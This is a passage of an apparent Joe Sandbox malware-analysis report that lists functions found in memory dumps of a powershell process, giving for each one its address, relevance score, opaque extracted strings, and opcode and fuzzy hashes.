                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (ful
                                                                                                        • API String ID: 0-517230495
                                                                                                        • Opcode ID: 8f86dbeb0938cfc73cafe128e4bc06652b125b9e246862de2493d7947bf9ea25
                                                                                                        • Instruction ID: 378b38434e9887185f97fa15b88063cabd3b7842863cf5e3bba1fe49d1ec7d10
                                                                                                        • Opcode Fuzzy Hash: 8f86dbeb0938cfc73cafe128e4bc06652b125b9e246862de2493d7947bf9ea25
                                                                                                        • Instruction Fuzzy Hash: 818128B4A04205EFCB14CF58C586E99BBF2BF88314F1580A9D825AB355CB72ED51CF91
                                                                                                        Function 07AAE133 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'^q
                                                                                                        • API String ID: 0-1614139903
                                                                                                        • Opcode ID: 9e040bdd732053ad646e86a528df2080ab0a282da2e26d47a03eed0867da93a7
                                                                                                        • Instruction ID: d97e62dfdc1b503fac8ee9aead23771f383876015df2518e656ddf1fc10fdf8f
                                                                                                        • Opcode Fuzzy Hash: 9e040bdd732053ad646e86a528df2080ab0a282da2e26d47a03eed0867da93a7
                                                                                                        • Instruction Fuzzy Hash: 5D31FDF1608321BFCF254B2444027BE7BF19FD2341F5541AAC820CF295DB398949C7A2
                                                                                                        Function 07AA7776 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: x.fk
                                                                                                        • API String ID: 0-1423657076
                                                                                                        • Opcode ID: cdd722fe1d05f8727a96297bc6c875c8f9efb4874342c349452203cbc79f455c
                                                                                                        • Instruction ID: 06449c29a230ba5e9e1903bb155d226a027b47fb21e21e51959aff5fb1a344b2
                                                                                                        • Opcode Fuzzy Hash: cdd722fe1d05f8727a96297bc6c875c8f9efb4874342c349452203cbc79f455c
                                                                                                        • Instruction Fuzzy Hash: 8A31B6B4B41218AFD704EB68C951FAF7AA3EB84344F108469E9016F395CF76AC45CB91
                                                                                                        Function 04BB3670 Relevance: .3, Instructions: 309COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2178086325.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4bb0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c1a8c00dc5d038dc8a2d74b8fdbd25d65d8ec69dcb6c74b27c252e35f154daa5
                                                                                                        • Instruction ID: 164eee7edc34bde5f245b39c53cab8d1e58b65ac1778d2ffd0627e1445dce958
                                                                                                        • Opcode Fuzzy Hash: c1a8c00dc5d038dc8a2d74b8fdbd25d65d8ec69dcb6c74b27c252e35f154daa5
                                                                                                        • Instruction Fuzzy Hash: 28D12774A012099FCB05CFA8D584AADFBF2FF48310F258199E885AB365C775ED85CB90
                                                                                                        Function 04BBE922 Relevance: .3, Instructions: 278COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2178086325.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4bb0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: aa90099e11e3c4b0558ee9d4328473d89dae614d12cbe15107ab555ae4729c13
                                                                                                        • Instruction ID: 5238b58db32c5306531606e651f00160454d2a17defec790bbe7139be0c7e005
                                                                                                        • Opcode Fuzzy Hash: aa90099e11e3c4b0558ee9d4328473d89dae614d12cbe15107ab555ae4729c13
                                                                                                        • Instruction Fuzzy Hash: B7B14C70E002099FDB11CFA9D8857EDBBF1FF88314F148169E855A7264EBB4E846CB91
                                                                                                        Function 04BB8D38 Relevance: .3, Instructions: 266COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2178086325.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4bb0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a7439f8560b1253c8871788a33ec2a281d5b812087401829aa08014633db81c0
                                                                                                        • Instruction ID: 139d7fb82fcc360350028419f2eac2ce1287c00d4e82901c3acf6009b8b00170
                                                                                                        • Opcode Fuzzy Hash: a7439f8560b1253c8871788a33ec2a281d5b812087401829aa08014633db81c0
                                                                                                        • Instruction Fuzzy Hash: C0A19275B002489FDB14EFA4C984AADBBB6FF84304F114558E546AF364DBB4ED49CB80
                                                                                                        Function 04BBF1EE Relevance: .3, Instructions: 264COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2178086325.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4bb0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c3f179976af5f4495625e96e687bff371fd4736d66a0bc2b6da94ff0ac2af806
                                                                                                        • Instruction ID: 882a46781d9497cf3bd9956966768d64724081bd870cb8a8d80f03951de59f00
                                                                                                        • Opcode Fuzzy Hash: c3f179976af5f4495625e96e687bff371fd4736d66a0bc2b6da94ff0ac2af806
                                                                                                        • Instruction Fuzzy Hash: 46B11970E002099FDB14CFA9D8857FDBBF1AB88314F148569E459E7254EBB4A885CB81
                                                                                                        Function 04BB8528 Relevance: .2, Instructions: 228COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2178086325.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4bb0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dc5d35f42060d93c09747e78b2d109d931f2440ab49e54a8be24364b31bbc4c3
                                                                                                        • Instruction ID: 9fb77199c0200f74a1eb859fd62eb2710a5752c29f0cc482a708ecfa1d4257a7
                                                                                                        • Opcode Fuzzy Hash: dc5d35f42060d93c09747e78b2d109d931f2440ab49e54a8be24364b31bbc4c3
                                                                                                        • Instruction Fuzzy Hash: 2791C034A052049FCB15EF69D844AEEBBF6FF89310F1485B9E4859B361CB74E885CB90
                                                                                                        Function 04BB9488 Relevance: .2, Instructions: 192COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2178086325.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4bb0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d4638224d49e58c7b576309a03866d6ace9b7d389ec716d58428c7ff1e9dcf24
                                                                                                        • Instruction ID: 01c4a28251d72015c4fc9b48871644bcd94c7ec159f130fc9ef0d207c68c9527
                                                                                                        • Opcode Fuzzy Hash: d4638224d49e58c7b576309a03866d6ace9b7d389ec716d58428c7ff1e9dcf24
                                                                                                        • Instruction Fuzzy Hash: F671AC70A002098FCB14DF69D880AEEBBF6FF84314F14C56AE4599B755DBB1AC46CB90
                                                                                                        Function 04BB95F6 Relevance: .2, Instructions: 188COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2178086325.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4bb0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cfb81de4c97a6d101a87a338b73d46d56b097a09f5386d4970dfe76a2d409b0c
                                                                                                        • Instruction ID: 288dc27702b4de553398125ed6cdbd575d4c2702b1730225f6b6249ab0527139
                                                                                                        • Opcode Fuzzy Hash: cfb81de4c97a6d101a87a338b73d46d56b097a09f5386d4970dfe76a2d409b0c
                                                                                                        • Instruction Fuzzy Hash: 1E714B70A002089FDB18DFA5D884BEDBBF6FF88304F148469D551AB760DB75AC86CB90
                                                                                                        Function 04BB9473 Relevance: .1, Instructions: 144COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2178086325.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4bb0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 19be428d5604150024911b42b89b7a16d38270cc9ed2b3bad821da773cd83a77
                                                                                                        • Instruction ID: cc04d7ee12affe5e42a93801bdd019a71c974e2eff979ef02669dda128c48039
                                                                                                        • Opcode Fuzzy Hash: 19be428d5604150024911b42b89b7a16d38270cc9ed2b3bad821da773cd83a77
                                                                                                        • Instruction Fuzzy Hash: 05518FB0A00209DFDB18DFA9C8847EDBBB6FF84304F148469D546AB754DBB4AC85CB90
                                                                                                        Function 04BBBD6B Relevance: .1, Instructions: 123COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2178086325.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4bb0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1c0c84a21c3857d27fc70b7fb8b541b25b6c8f1567636304534f84f3cab0fdcf
                                                                                                        • Instruction ID: 7d9a60dc6ab700f2e7a13e61fa4a53a5e55e4c0578a84cf21066e62bd8470b12
                                                                                                        • Opcode Fuzzy Hash: 1c0c84a21c3857d27fc70b7fb8b541b25b6c8f1567636304534f84f3cab0fdcf
                                                                                                        • Instruction Fuzzy Hash: FB415F34A052188FCB25EF64D8946EEB7F2BF49305F1048E9D549AB361CB75AE85CF80
                                                                                                        Function 04BB9219 Relevance: .1, Instructions: 120COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2178086325.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4bb0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: bad761eea5cbd117a62bce64a85a2c85c05861d06131272757cfb9037bed446a
                                                                                                        • Instruction ID: 3bba29e72ca1323669f530a32a8194b1710f15bb533348ac00d56277fb5eb4eb
                                                                                                        • Opcode Fuzzy Hash: bad761eea5cbd117a62bce64a85a2c85c05861d06131272757cfb9037bed446a
                                                                                                        • Instruction Fuzzy Hash: 35418F71B002048FD718EF64D994AAD7BB6FF89310F1540A8E546EB7A4DB74AC45CB90
                                                                                                        Function 04BB31C8 Relevance: .1, Instructions: 65COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2178086325.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4bb0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c5031d155b6149d3b52da2c6572586f4170e884f98d5132a52b4dacf5d9e2b1d
                                                                                                        • Instruction ID: 92b784512d1f13cf4d034794ab03be5ee794655386234f312f256fc9f5131067
                                                                                                        • Opcode Fuzzy Hash: c5031d155b6149d3b52da2c6572586f4170e884f98d5132a52b4dacf5d9e2b1d
                                                                                                        • Instruction Fuzzy Hash: 94215EB4A042199FCB00CF98C8809AEBBF1FF89300B158495E855EB352C731FD41CBA1
                                                                                                        Function 04BB39B0 Relevance: .1, Instructions: 63COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2178086325.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4bb0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e0c9c4b6c3fa5e72e9724efb33c9fd1212d880e861b651230ffb09e109ab7a0c
                                                                                                        • Instruction ID: 7fc7fc045510f50ca846503de7274aa48933aad741639b2e4e90f7a358d4df2e
                                                                                                        • Opcode Fuzzy Hash: e0c9c4b6c3fa5e72e9724efb33c9fd1212d880e861b651230ffb09e109ab7a0c
                                                                                                        • Instruction Fuzzy Hash: CF21C474A005099FCB04CF89C5849AAFBF1FB88310B2585A9E959EB765C731FC51CBA0
                                                                                                        Function 04BB31B9 Relevance: .1, Instructions: 58COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2178086325.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4bb0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9bd077fabd76921627b530388ae01463993ca614a159586595d53cc99de2e36d
                                                                                                        • Instruction ID: 5354af6d59af9b7a46802979f5d1537727202dda8d2aa5c41154c5776cc8dcd8
                                                                                                        • Opcode Fuzzy Hash: 9bd077fabd76921627b530388ae01463993ca614a159586595d53cc99de2e36d
                                                                                                        • Instruction Fuzzy Hash: 04214474A0060A8FCB00CF98D9809AAFBF1FF89300B158599E809EB352C731FC41CBA0
                                                                                                        Function 07AA0AB9 Relevance: .0, Instructions: 36COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 17a0830f1c67dfe8975cc6747f59f857d854de7cfa3cd6afab827a3a036ab7f3
                                                                                                        • Instruction ID: 32bbd62761845991a9c81f75fdbe5f4299f4711b6a22e8375ee5a328b8892c21
                                                                                                        • Opcode Fuzzy Hash: 17a0830f1c67dfe8975cc6747f59f857d854de7cfa3cd6afab827a3a036ab7f3
                                                                                                        • Instruction Fuzzy Hash: 30F062B0E04716EFC3184F29D58462BBBE6FBC4758F25892DD46D9B600D731AC85CB90
                                                                                                        Function 04BBFEBF Relevance: .0, Instructions: 34COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2178086325.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4bb0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: faaba7a60846953cb977ec0cefb7de0821918596b0e100a0d4d62868973a90fe
                                                                                                        • Instruction ID: aa3b8e42452b72f4d8df50fe0cd93a6fe5ce886ff6469d1b4459d971b7d3d823
                                                                                                        • Opcode Fuzzy Hash: faaba7a60846953cb977ec0cefb7de0821918596b0e100a0d4d62868973a90fe
                                                                                                        • Instruction Fuzzy Hash: 86013C71E00109DFCB14CF98D8809BDF7B2FF88324B248668E419E7654C732AC51CB90
                                                                                                        Function 04BBFBD4 Relevance: .0, Instructions: 30COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2178086325.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4bb0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b89f9eb64560d12a5aa8db063507bbe4fe3fd4e84534b13ba5ab62537c099696
                                                                                                        • Instruction ID: dc0c3bc667af4f8548c6faafb0928d563d479cc5dead462c2e18f4daf39f10dd
                                                                                                        • Opcode Fuzzy Hash: b89f9eb64560d12a5aa8db063507bbe4fe3fd4e84534b13ba5ab62537c099696
                                                                                                        • Instruction Fuzzy Hash: 58F03035A001189FCB54CF8DD8509EDF7B6FF8C220B248559E458E7264C732AC56CB50
                                                                                                        Function 04BB2D5E Relevance: .0, Instructions: 29COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2178086325.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4bb0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e8e7e3a67ae9400e1f36abc7a3f16b78889f37e963cdda60a4be0bd2378bd5e8
                                                                                                        • Instruction ID: 76e91f6f103e853e2118108005f463b37cdb407c45f8d8cbc046ebcc6a5d9691
                                                                                                        • Opcode Fuzzy Hash: e8e7e3a67ae9400e1f36abc7a3f16b78889f37e963cdda60a4be0bd2378bd5e8
                                                                                                        • Instruction Fuzzy Hash: 24F0DA75A001059FCB15CF9CD994AEEF7B1FF88324F208199E555A72A1C736EC52CB90

                                                                                                        Non-executed Functions

                                                                                                        Function 07AA2128 Relevance: 12.8, Strings: 10, Instructions: 322COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                        • API String ID: 0-3512890053
                                                                                                        • Opcode ID: 867796c5bca170012a957b400e00c8d9fbde109ecffd9a102fcfbfa7bc20241b
                                                                                                        • Instruction ID: 809962df6a064556035f283bc16f125b57260af14f1e12cc8b744f5bb1a75a42
                                                                                                        • Opcode Fuzzy Hash: 867796c5bca170012a957b400e00c8d9fbde109ecffd9a102fcfbfa7bc20241b
                                                                                                        • Instruction Fuzzy Hash: 75A149B1B04316AFCB294B29984077ABBE1BFC2210F14847AD561CF2D5DF31C8A5C3A1
                                                                                                        Function 07AA18C8 Relevance: 12.8, Strings: 10, Instructions: 309COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                                                                        • API String ID: 0-788909730
                                                                                                        • Opcode ID: 3ed8d7c96d3e9b79fe910197ab47e4bf84c7688221b445d8519036662737a813
                                                                                                        • Instruction ID: e923262e1db340f711efcd903f0ef8c82e679455458f543f5060472fa9684364
                                                                                                        • Opcode Fuzzy Hash: 3ed8d7c96d3e9b79fe910197ab47e4bf84c7688221b445d8519036662737a813
                                                                                                        • Instruction Fuzzy Hash: E5A107B1B0021DBFCB289F69C540AAABBF2AFC5310F14846AE4658F354EF32D945C791
                                                                                                        Function 07AAD3EA Relevance: 11.4, Strings: 9, Instructions: 153COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (ful$(ful$(ful$(ful$4'^q$4'^q$4rl$4rl$tLgk
                                                                                                        • API String ID: 0-2157607289
                                                                                                        • Opcode ID: 9c8b62d0738783b4d8ebfd997b05a8745b91016f8da94d70411da64c24e6d224
                                                                                                        • Instruction ID: 8fccd580edaf43ddae134fc2a6763b2c736b5b18020f2ff4cafaf0c31b36ae62
                                                                                                        • Opcode Fuzzy Hash: 9c8b62d0738783b4d8ebfd997b05a8745b91016f8da94d70411da64c24e6d224
                                                                                                        • Instruction Fuzzy Hash: AB51BEB0B00209EFDB14CB58C554A6ABBF3AFC4314F148469D4659FB68DB36EC41CB92
                                                                                                        Function 07AAEA5D Relevance: 10.3, Strings: 8, Instructions: 254COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 84sl$84sl$84sl$84sl$tP^q$tP^q$tP^q$tP^q
                                                                                                        • API String ID: 0-2034676923
                                                                                                        • Opcode ID: bd5148b34968b66d3d693b118ebe945fe2c99bc4323967200510c4f81e98214a
                                                                                                        • Instruction ID: 43a8f9c9e14a0626aca6658e6eab6e459de29ff1b047d0959fa839332dc55074
                                                                                                        • Opcode Fuzzy Hash: bd5148b34968b66d3d693b118ebe945fe2c99bc4323967200510c4f81e98214a
                                                                                                        • Instruction Fuzzy Hash: A391E3B1B04215AFCB24DF58C946A7ABBE2BBC8711F18C869E8169F390DB31DC41C791
                                                                                                        Function 07AA978D Relevance: 10.2, Strings: 8, Instructions: 166COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'^q$84sl$TQcq$TQcq$tP^q$$^q$$^q$$^q
                                                                                                        • API String ID: 0-1148624245
                                                                                                        • Opcode ID: 4631e08882e8a8d9278777c9e204d8796d577569765523a00f66d27330b068ec
                                                                                                        • Instruction ID: 5f7eef5c51dcfda2d35b13731f36628fbd88a35d8dd57552574fb6cd2787ebd3
                                                                                                        • Opcode Fuzzy Hash: 4631e08882e8a8d9278777c9e204d8796d577569765523a00f66d27330b068ec
                                                                                                        • Instruction Fuzzy Hash: 6351C3F0A04206FFDB258F15C504BA7B7B5AF89312F1884A6E8645F2A1C731FD95CBA1
                                                                                                        Function 07AA7EF0 Relevance: 7.7, Strings: 6, Instructions: 204COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                        • API String ID: 0-2392861976
                                                                                                        • Opcode ID: cbf4c8cf194f0295b9c7683fe57103906402c164ade081464915370cea879610
                                                                                                        • Instruction ID: 73e4e81e30f7fdcc8747336910123b6adc56c1b3407e2aa7cdc80abd60abdedb
                                                                                                        • Opcode Fuzzy Hash: cbf4c8cf194f0295b9c7683fe57103906402c164ade081464915370cea879610
                                                                                                        • Instruction Fuzzy Hash: D85147B2704257AFCB2A8B79980067BBBF5AFC1211B18847BD465CF251DF36C949C361
                                                                                                        Function 07AADEF0 Relevance: 6.4, Strings: 5, Instructions: 187COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                        • API String ID: 0-3272787073
                                                                                                        • Opcode ID: c8b0890fb9f17b12215da1c3fe31f98c9f22ae9a22914255fa0022692c0a34c9
                                                                                                        • Instruction ID: 609e4e3aed024cc86cb2ef801d6a433d18972cd0687d6186785f9e18eb4ae107
                                                                                                        • Opcode Fuzzy Hash: c8b0890fb9f17b12215da1c3fe31f98c9f22ae9a22914255fa0022692c0a34c9
                                                                                                        • Instruction Fuzzy Hash: 5A5128B1B4820AEFCB249F28D4056AE7BB1AF86720F14807AE565CF759CB31DD84C791
                                                                                                        Function 07AA18AB Relevance: 6.4, Strings: 5, Instructions: 122COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                                                                                        • API String ID: 0-3997570045
                                                                                                        • Opcode ID: c6c839aec4444ba7d7f7f3ba5487bb2e383cc5d67bea36653b81bb2d853e9adc
                                                                                                        • Instruction ID: 09ee16e63010df449626b63f6f11003dd34ba623afb9f3a57757dbb5e7428ef3
                                                                                                        • Opcode Fuzzy Hash: c6c839aec4444ba7d7f7f3ba5487bb2e383cc5d67bea36653b81bb2d853e9adc
                                                                                                        • Instruction Fuzzy Hash: FE4118B0A0820EFFDB258F55C544FA57BF2EF86320F1881AAE4259F291CB31D845CB91
                                                                                                        Function 07AA3ECD Relevance: 6.4, Strings: 5, Instructions: 109COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
